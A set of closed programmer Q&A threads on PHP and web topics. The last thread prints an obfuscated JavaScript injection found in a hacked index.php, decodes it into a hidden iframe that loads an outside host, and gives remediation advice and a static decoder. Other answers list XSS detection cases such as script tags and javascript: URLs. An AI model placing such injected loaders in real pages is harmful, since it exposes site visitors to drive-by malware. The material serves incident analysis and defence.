Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
Lately, I have been fond of live code editors such as cssdeck and jsFiddle, and I want to replicate my own with one small twist: php code.
The basic elements behind these live code editors are textarea, javascript, and an iframe. You can see the final results either via js script or php form. I went through the js script route, and it works fine for html, css, and js, but not php; the site shows up empty like nothing has been entered. When I went the php form route, I got the same results. With php forms, however, I have the ability to create/write php files, which would then display the code correctly, but that would remove the live editing function. I'm wondering if you know any other routes to finish the intended project besides the ones above. Also, I tried:
<?php
$codeInput = stripslashes($_POST['code']);
?>
and that turned nothing.
You want to use htmlspecialchars, not stripslashes.
htmlspecialchars is specifically for encoding things like <, as in <?php.
stripslashes only removes backslashes (\).
Be very careful with this, however; directly outputting unfiltered user input can lead to XSS attacks, even if you use htmlspecialchars. Read more here.
As an aside, you probably don't need to roll your own editor for this. You might check out http://ideone.com/ instead, which is basically a jsFiddle for PHP and a large number of other languages.
Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 5 years ago.
I have plain HTML code, without Javascript code in it.
How would you detect if any form of Javascript was injected in the HTML ?
The application generates HTML client side. And needs to validate it once it arrives on the server.
The goal is NOT to remove Javascript, but simply detect the presence of it.
This is what tools like HTML Purifier are for. They break the input into tokens and run them against a whitelist.
This is safer than trying to find specific ways of inserting scripts into HTML, because there are tricks with malformed tags or non-obvious attributes being used. See the XSS Evasion Cheat Sheet for example.
Removing can be easier than detecting - just escape all the HTML etc. you get with htmlspecialchars($string).
Alright, so this is a very interesting challenge:
First, check for all script tags, both capital and lowercase
<SCRIPT> <script> <sCrIPt>
Then, check for event handlers (onclick etc).
For this, we use DOM
$dom = new DOMDocument;
$dom->loadHTML($string);
You can work all sorts of magic with DOM; I recommend reading their documentation. Check for any attributes with "on" in them.
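The two approaches in the answers above can be combined: parse with DOMDocument, then report every tag, attribute or URL scheme that is not on an allowlist instead of hunting for known script patterns. This is an added example, not code from any of the answers; the allowlists, the function name `findScriptVectors` and the sample inputs are assumptions to adapt to what the application actually generates.

```php
<?php
// Added example: report anything outside an allowlist in HTML received by the server.
// All lists below are assumptions; set them to what the application itself generates.
const WRAPPER_TAGS    = ['html', 'head', 'body'];   // inserted by loadHTML()
const ALLOWED_TAGS    = ['p', 'div', 'span', 'a', 'b', 'i', 'em', 'strong',
                         'ul', 'ol', 'li', 'br', 'img', 'h1', 'h2', 'h3'];
const ALLOWED_ATTRS   = ['href', 'src', 'alt', 'title', 'class'];
const URL_ATTRS       = ['href', 'src'];
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

function findScriptVectors(string $html): array
{
    $dom = new DOMDocument();
    libxml_use_internal_errors(true);   // malformed markup must not abort the check
    $dom->loadHTML('<?xml encoding="UTF-8">' . $html, LIBXML_NONET);
    libxml_clear_errors();
    $findings = [];
    foreach ($dom->getElementsByTagName('*') as $el) {
        $tag = strtolower($el->nodeName);   // the HTML parser already folds case
        if (!in_array($tag, WRAPPER_TAGS, true) && !in_array($tag, ALLOWED_TAGS, true)) {
            $findings[] = "tag <$tag> is not on the allowlist";
            continue;
        }
        foreach ($el->attributes as $attr) {   // wrapper tags get this check too
            $name = strtolower($attr->nodeName);
            if (!in_array($name, ALLOWED_ATTRS, true)) {   // covers every on* handler
                $findings[] = "attribute $name on <$tag> is not on the allowlist";
            } elseif (in_array($name, URL_ATTRS, true)) {
                $value = preg_replace('/[\x00-\x20]+/', '', $attr->nodeValue);
                if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $value, $m)
                    && !in_array(strtolower($m[1]), ALLOWED_SCHEMES, true)) {
                    $findings[] = "scheme {$m[1]}: in $name on <$tag>";
                }
            }
        }
    }
    return $findings;
}

// Constructed inputs: one clean document, then the cases named in the answers.
$samples = [
    '<p class="note">Hello <a href="https://example.com/">link</a></p>',
    '<p>hi</p><sCrIPt>alert(1)</sCrIPt>',
    '<div onclick="alert(1)">click</div>',
    '<a href="javascript:alert(1)">x</a>',
];
foreach ($samples as $html) {
    echo $html, ' => ', implode('; ', findScriptVectors($html)) ?: 'clean', PHP_EOL;
}
```

An empty result means nothing outside the allowlist was found; any entry is grounds to reject the submission, which matches the stated goal of detecting rather than removing.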
Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
This is probably a simple question, but I'm struggling with this.
Basically, how to browse in a database, as the user is typing something?
For example, in a website such as https://www.doesthedogdie.com/, how do they do it to show all the movies beginning with the string of characters you're typing, as you're typing it?
I guess javascript is involved?
It's called autocomplete
Please do some googling next time yourself.
You can use jQuery autocomplete or Bootstrap typeahead to achieve this.
Hope this helps
My personal preference on how to make these kind of systems is fairly awkward, yet it seems to work just fine for me without requiring too much client-side scripting. I use ASP.NET's Page_Load event to save all content in a SQL database into an XML file. Then, when the user enters some text into the field, I make a hidden div class underneath it unhidden to display filtered results from the XML document. This way, you can update the SQL database at any time fairly simply to add new records which should be listed on the website. This is server-side scripting, which I prefer to client-side because the user can disable features and mess around with it to view your code which is something I personally hate. I hope this helps you somewhat.
Closed. This question needs debugging details. It is not currently accepting answers.
Closed 7 years ago.
I'm trying to generate HTML using PHP and have that HTML printed out and displayed on a site for a user to then copy and paste elsewhere. My problem, however, is that whenever I try to use print or echo statements and type in the HTML, the HTML is being rendered instead of simply just printed. I even put the HTML as a string into a variable and tried printing/echoing that variable but it was also rendered. Is there any way to literally just have the words I'm typing (which happen to be HTML) printed or displayed in some way on the page in a box or something of the sort?
If I understood your question, I think you should use htmlentities():
print htmlentities('<br>');
This will show the tag instead of generating a new line.
Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
Is there a way to create a page turner effect for PDF files with Angular? jQuery solutions are also fine. I have seen turn.js, which uses HTML. Can anyone help find a way for PDF files?
If you are talking about the pages within a PDF having a page curl effect then it is not something you can do with js, html or anything else outside the PDF itself without converting the PDF to something else (ie flash, jpg images, etc).
Last time I checked the only way to achieve this within a PDF was by using Acrobat Pro or InDesign and using 'Page Transitions'.
Please note that out of the available page transitions 'Page Turn' (the curl effect you want) will cause the document to be converted to a flash file and then embedded in the PDF.
I'm sorry if this is not what you want to hear. Rather than creating fancy page curl/turn effects it is probably better to concentrate on producing a well designed, easy to navigate document with great content. This will provide much better value.
Closed. This question is off-topic. It is not currently accepting answers.
Closed 11 years ago.
Somehow my index.php file at the server got modified. As a result, when I open my webpage, I get redirected automatically to this address: redirected url
It seems someone has hacked my application. I found the index.php file was added with the following JavaScript:
<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k
58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>
Does anyone know the meaning of above script?
By removing that script, my web could run well as it was. Any recommendation about how to prevent this attack?
That's just a bunch of obfuscated code; no one will tell you the meaning of that (most likely, except Jon Skeet).
I would suggest you remove that script from the page, and revert to your last commit (you ARE using a version control system, aren't you? :)
This is the code that gets eval'd:
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://paseroper.in/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://paseroper.in/in.cgi?default');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Creates an <iframe> that goes to that URL.
As for how to prevent it, you'll need to find out how the code got in there. Likely one of your scripts allowed them to run arbitrary code on your server, so I would check all php plugins, and any place where you may allow users to enter information and make sure you are properly filtering things.
Also, you'll likely want to let your users know. From the looks of it, the <iframe> is hidden, which indicates it might be a site in which they try and do drive-by installs of malware or spyware.
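How the decoded output above is obtained without running the script, as an added example that is not part of the original answer: the injected code sets t = 'k' as the separator and h = (ddd - d2) * -1 = -2, so each number is half a character code. The function names, the 15-token threshold and the sample string are assumptions made for this example; nothing is passed to eval().

```php
<?php
// Added example: statically decode the "k"-separated number string found in
// a modified file and list the URLs it references. Nothing is executed.

// Each token is a character code divided by 2 (the script computes
// String.fromCharCode(-h * n[i]) with h = -2).
function decodePayload(string $encoded, string $sep = 'k', float $factor = 2.0): string
{
    $out = '';
    foreach (explode($sep, $encoded) as $token) {
        if (!is_numeric($token)) {
            continue;   // empty token after a trailing separator, or stray text
        }
        $out .= chr((int) round((float) $token * $factor));
    }
    return $out;
}

// Find long runs of "<number>k<number>k..." in file contents and decode each.
// $minTokens (assumed value) keeps short coincidental matches out of the report.
function findEncodedPayloads(string $source, int $minTokens = 15): array
{
    $pattern = '/(?:\d+(?:\.\d+)?k){' . $minTokens . ',}(?:\d+(?:\.\d+)?)?/';
    preg_match_all($pattern, $source, $runs);
    $findings = [];
    foreach ($runs[0] as $run) {
        $decoded = decodePayload($run);
        preg_match_all('~https?://[^\s\'"<>)]+~i', $decoded, $urls);
        $findings[] = ['decoded' => $decoded, 'urls' => array_unique($urls[0])];
    }
    return $findings;
}

// Constructed sample: a short string encoded the same way, pointing at a
// placeholder host. It is not the payload from the question.
$sample = '<body><script>n=["57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k50.5k'
    . '60k48.5k54.5k56k54k50.5k23k52.5k55k59k48.5k54k52.5k50k23.5k60k19.5"];'
    . '</script></body>';

foreach (findEncodedPayloads($sample) as $finding) {
    echo 'decoded: ', $finding['decoded'], PHP_EOL;
    echo 'urls:    ', implode(', ', $finding['urls']), PHP_EOL;
}
```

Running `findEncodedPayloads(file_get_contents($path))` over each file in the web root shows which files carry the same injection and which hosts to look for in proxy or DNS logs.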